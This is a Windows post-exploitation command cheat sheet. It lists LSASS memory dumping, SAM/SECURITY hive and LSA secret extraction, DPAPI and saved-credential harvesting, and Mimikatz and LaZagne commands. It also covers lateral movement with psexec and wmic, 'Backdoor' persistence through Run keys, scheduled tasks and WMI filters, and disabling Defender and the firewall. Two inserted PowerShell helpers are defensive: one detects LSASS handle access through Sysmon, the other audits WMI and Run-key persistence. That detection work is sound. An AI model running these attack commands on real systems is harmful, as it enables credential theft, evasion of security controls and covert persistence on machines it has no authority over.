## Procdump method
procdump.exe -accepteula -ma lsass.exe lsass.dmp
procdump.exe -accepteula -ma %windir%\system32\lsass.exe lsass.dmp
## Native Windows dumping
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> <output_file> full
tasklist | findstr lsass.exe
for /f "tokens=2" %i in ('tasklist ^| findstr lsass.exe') do @rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump %i lsass.dmp full
## Taskkill method (destructive)
taskkill /F /IM lsass.exe
## WMI method
wmic process where "name='lsass.exe'" get ProcessId
Get-WmiObject Win32_Process -Filter "name = 'lsass.exe'" | Select-Object ProcessId
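Every method in the list above has to open a handle to lsass.exe, which is exactly what Sysmon records as Event ID 10 (ProcessAccess). The function below is an added detection helper, not part of this cheat sheet or of Sysmon's own tooling: it reads the Sysmon operational log named in the event log section of this page, flattens each event's EventData, and returns the processes that opened LSASS, with the access mask they requested. It assumes Sysmon is installed with ProcessAccess logging configured and that the caller can read the log (Administrators or Event Log Readers); the function name and the KnownGood parameter are this example's own.

```powershell
# Added detection helper for LSASS handle access; not from the cheat sheet above.
# Assumes Sysmon with Event ID 10 (ProcessAccess) enabled and rights to read its log.
function Get-LsassAccessEvent {
    [CmdletBinding()]
    param(
        [int]$MaxEvents = 1000,
        # Full paths of processes known to open LSASS legitimately on this host
        # (AV/EDR agents, for example). Empty by default so nothing is hidden until baselined.
        [string[]]$KnownGood = @()
    )
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 10 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Flatten <EventData><Data Name="...">value</Data> into a hashtable
            $xml = [xml]$_.ToXml()
            $d = @{}
            foreach ($node in $xml.Event.EventData.Data) { $d[$node.Name] = $node.'#text' }

            if ($d['TargetImage'] -notlike '*\lsass.exe') { return }
            if ($KnownGood -contains $d['SourceImage']) { return }

            [pscustomobject]@{
                TimeCreated   = $_.TimeCreated
                SourceImage   = $d['SourceImage']
                SourcePid     = $d['SourceProcessId']
                # Memory-dump tools request broad rights; 0x1010 and 0x1FFFFF are
                # the masks most often seen, while AV/EDR baselines vary per product
                GrantedAccess = $d['GrantedAccess']
                CallTrace     = $d['CallTrace']
            }
        }
}

# Usage: everything that touched LSASS in the last 2000 ProcessAccess events, newest first
Get-LsassAccessEvent -MaxEvents 2000 | Format-Table -AutoSize
```

Run it once on a clean host to populate KnownGood, then anything that remains (especially a SourceImage under a user profile, Temp, or rundll32.exe) is worth an incident ticket; the CallTrace column shows whether the handle was opened through dbghelp/dbgcore, which is what MiniDump-based tools use.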
Complete Registry Credential Extraction
# Complete registry credential extraction
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
reg save HKLM\SECURITY security.save
# LSA secrets
reg query "HKLM\SECURITY\Policy\Secrets"
reg query "HKLM\SECURITY\Policy\Secrets\DefaultPassword"
reg query "HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC"
reg query "HKLM\SECURITY\Policy\Secrets\NL$KM"
# DPAPI keys
reg save "HKLM\SECURITY\Policy\Secrets\DPAPI_SYSTEM" dpapi_system.save
reg save "HKCU\Software\Microsoft\Protected Storage System Provider" pssp.save
# Proxy settings (Internet Settings)
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyUser
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyPass
Complete DPAPI & Credential Manager
# Complete DPAPI and credential manager enumeration
vaultcmd /list
vaultcmd /listcreds:"Windows Credentials"
vaultcmd /listproperties
vaultcmd /listschema
# Credential manager GUI
rundll32.exe keymgr.dll,KRShowKeyMgr
cmdkey /list
# DPAPI directory
dir /a "C:\Users\<username>\AppData\Roaming\Microsoft\Protect"
dir /a "C:\Users\<username>\AppData\Roaming\Microsoft\Credentials"
dir /a "C:\Users\<username>\AppData\Local\Microsoft\Credentials"
# Master key files
dir /a "C:\Users\<username>\AppData\Roaming\Microsoft\Protect\<SID>\*"
dir /a "C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys"
Complete Saved Credentials Enumeration
# Complete saved credentials enumeration
## RDP saved credentials
reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers"
reg query "HKCU\Software\Microsoft\Terminal Server Client\Default"
reg query "HKCU\Software\Microsoft\Terminal Server Client\Default" /v MR*
## IIS application pool credentials
type %windir%\system32\inetsrv\config\applicationHost.config | findstr /i "password"
type C:\inetpub\wwwroot\web.config | findstr /i "password"
## SQL connection strings
dir /s /b *.config | findstr /i web.config
findstr /S /I "connectionString" *.config
findstr /S /I "password" *.config | findstr /v "//"
## Windows Vault
reg query "HKCU\Software\Microsoft\Vault"
reg query "HKCU\Software\Microsoft\Vault\Capabilities"
reg query "HKCU\Software\Microsoft\Vault\GenericCredentials"

Tools & Frameworks Enumeration

Comprehensive enumeration tools and frameworks including PowerShell modules, third-party tools, automated scanners, and specialized enumeration suites.

Complete PowerShell Enumeration Modules
# Complete PowerShell enumeration modules
## Local system PowerShell
Get-LocalUser
Get-LocalGroup
Get-LocalGroupMember Administrators
Get-Process | Select-Object Name,Id,CPU,WorkingSet,Path,StartTime,Company,ProductVersion
Get-Service | Select-Object Name,DisplayName,Status,StartType
Get-ScheduledTask | Select-Object TaskName,TaskPath,State
Get-NetIPConfiguration
Get-NetFirewallRule | Select-Object Name,Enabled,DisplayName,Description
## WMI PowerShell
Get-WmiObject -Class Win32_ComputerSystem
Get-WmiObject -Class Win32_OperatingSystem
Get-WmiObject -Class Win32_UserAccount
Get-WmiObject -Class Win32_Group
Get-WmiObject -Class Win32_Service
Get-WmiObject -Class Win32_Process
Get-WmiObject -Class Win32_Product
## Network PowerShell
Get-NetTCPConnection | Select-Object LocalAddress,LocalPort,RemoteAddress,RemotePort,State,OwningProcess
Get-NetUDPEndpoint | Select-Object LocalAddress,LocalPort,OwningProcess
Get-NetRoute | Select-Object DestinationPrefix,NextHop,RouteMetric,InterfaceAlias
Get-DnsClientCache
## File system PowerShell
Get-ChildItem -Path C:\ -Include *.txt,*.config,*.xml,*.ini,*.conf -File -Recurse -ErrorAction SilentlyContinue | Select-Object FullName
Get-ChildItem -Path C:\Users\* -Include *.txt,*.config,*.xml,*.ini,*.conf -File -Recurse -ErrorAction SilentlyContinue | Select-Object FullName
Get-ChildItem -Path C:\Windows\System32\config\SAM -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Windows\repair\SAM -ErrorAction SilentlyContinue
Complete Third-Party Tools
# Complete third-party tools enumeration
## PowerSploit
Get-ComputerInfo
Get-NetDomain
Get-NetUser
Get-NetGroup
Get-NetComputer
Get-NetShare
Get-NetSession
Get-NetLoggedon
Get-NetProcess
Find-DomainShare
Get-DomainGPO
Get-DomainTrust
## BloodHound
bloodhound-python -d <domain> -u <username> -p <password> -c All
SharpHound.exe --CollectionMethods All --Domain <domain> --ZipFileName output.zip
Invoke-BloodHound -CollectionMethod All -Domain <domain> -ZipFileName output.zip
## Seatbelt
Seatbelt.exe -group=all
Seatbelt.exe -group=system
Seatbelt.exe -group=user
Seatbelt.exe -group=process
Seatbelt.exe -group=network
Seatbelt.exe -group=antivirus
Seatbelt.exe AMSIBypass
Seatbelt.exe TokenPrivileges
Seatbelt.exe UAC
Seatbelt.exe PowerShell
## WinPEAS
winpeas.exe
winpeas.exe quiet
winpeas.exe quiet systeminfo
winpeas.exe quiet processinfo
winpeas.exe quiet servicesinfo
winpeas.exe quiet applicationsinfo
winpeas.exe quiet networkinfo
winpeas.exe quiet windowscreds
winpeas.exe quiet filesinfo
## JAWS
jaws-enum.ps1
Invoke-JAWS
## Sherlock
Find-AllVulns
Find-MS14058
Find-MS15051
Find-MS16032
Find-MS16135
Find-CVE20178199
## Mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
lsadump::secrets
token::elevate
vault::list
crypto::certificates
sekurlsa::tickets
kerberos::list
lsadump::dcsync
## LaZagne
laZagne.exe all
laZagne.exe browsers
laZagne.exe wifi
laZagne.exe sysadmin
laZagne.exe mails
laZagne.exe chats
laZagne.exe databases
laZagne.exe games

Advanced Techniques

Advanced enumeration techniques including lateral movement, persistence mechanisms, and defensive evasion.

Advanced Enumeration Commands
# Advanced enumeration techniques
## Lateral Movement
psexec.exe \\<target> cmd.exe
wmic /node:<target> process call create "cmd.exe"
schtasks /create /tn "TaskName" /tr "C:\shell.exe" /sc once /st 00:00 /S <target> /RU System
sc.exe \\<target> create ServiceName binPath= "C:\shell.exe" start= auto
## Persistence Mechanisms
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\shell.exe" /f
schtasks /create /tn "Backdoor" /tr "C:\shell.exe" /sc minute /mo 1 /ru SYSTEM
wmic /namespace:\\root\subscription path __EventFilter create Name="Backdoor", EventNamespace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
## Defensive Evasion
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
netsh advfirewall set allprofiles state off
reg add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v Start /t REG_DWORD /d 4 /f
taskkill /f /im MsMpEng.exe
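The persistence entries above (Run key, scheduled task, WMI event filter) and the raw root\subscription queries in the WMI enumeration section each show one half of the picture. The two functions below are an added audit helper, not part of this cheat sheet or of any tool it names: the first correlates every __FilterToConsumerBinding with its filter query and consumer payload so a subscription can be judged as a whole, the second walks the Run/RunOnce keys and flags commands launched from user-writable locations. They assume Windows PowerShell 5.1 (Get-WmiObject) and local administrator rights to read root\subscription; the function names and the Suspect heuristic are this example's own.

```powershell
# Added persistence audit helpers; not from the cheat sheet above.
# Assumes Windows PowerShell 5.1 and local admin rights (root\subscription is admin-only).
function Get-WmiPersistenceAudit {
    $ns = 'root\subscription'
    $filters   = @(Get-WmiObject -Namespace $ns -Class __EventFilter -ErrorAction SilentlyContinue)
    $consumers = @(Get-WmiObject -Namespace $ns -Class __EventConsumer -ErrorAction SilentlyContinue)
    $bindings  = @(Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding -ErrorAction SilentlyContinue)

    foreach ($b in $bindings) {
        # Filter and Consumer are WMI object paths such as __EventFilter.Name="X"; extract the Name key
        $fName = [regex]::Match($b.Filter,   'Name="([^"]*)"').Groups[1].Value
        $cName = [regex]::Match($b.Consumer, 'Name="([^"]*)"').Groups[1].Value
        $f = $filters   | Where-Object { $_.Name -eq $fName } | Select-Object -First 1
        $c = $consumers | Where-Object { $_.Name -eq $cName } | Select-Object -First 1

        # Only CommandLineEventConsumer and ActiveScriptEventConsumer carry a payload;
        # other consumer classes have neither property, so the value stays $null for them.
        $payload = if ($c.CommandLineTemplate) { $c.CommandLineTemplate } else { $c.ScriptText }

        [pscustomobject]@{
            Filter        = $fName
            Query         = $f.Query
            Consumer      = $cName
            ConsumerClass = $c.__CLASS
            Payload       = $payload
        }
    }
}

function Get-RunKeyAudit {
    $keys = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
            'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
            'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
            'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    foreach ($k in $keys) {
        $props = Get-ItemProperty -Path $k -ErrorAction SilentlyContinue
        if (-not $props) { continue }
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }                   # provider metadata (PSPath, PSDrive, ...)
            [pscustomobject]@{
                Key     = $k
                Name    = $p.Name
                Command = $p.Value
                # Heuristic: anything launched from a user-writable tree, or from outside
                # Program Files / Windows, deserves a closer look
                Suspect = ($p.Value -match '\\(Temp|AppData|ProgramData|Users\\Public)\\' -or
                           $p.Value -notmatch '^"?[A-Za-z]:\\(Program Files|Windows)')
            }
        }
    }
}

# Usage
Get-WmiPersistenceAudit | Format-List
Get-RunKeyAudit | Where-Object Suspect | Format-Table -AutoSize
```

A binding whose filter query polls a performance or timer class and whose consumer is a CommandLineEventConsumer is the classic shape of a WMI backdoor; on a clean workstation root\subscription normally contains only the SCM event log consumer, so every other binding should be explainable by a known product.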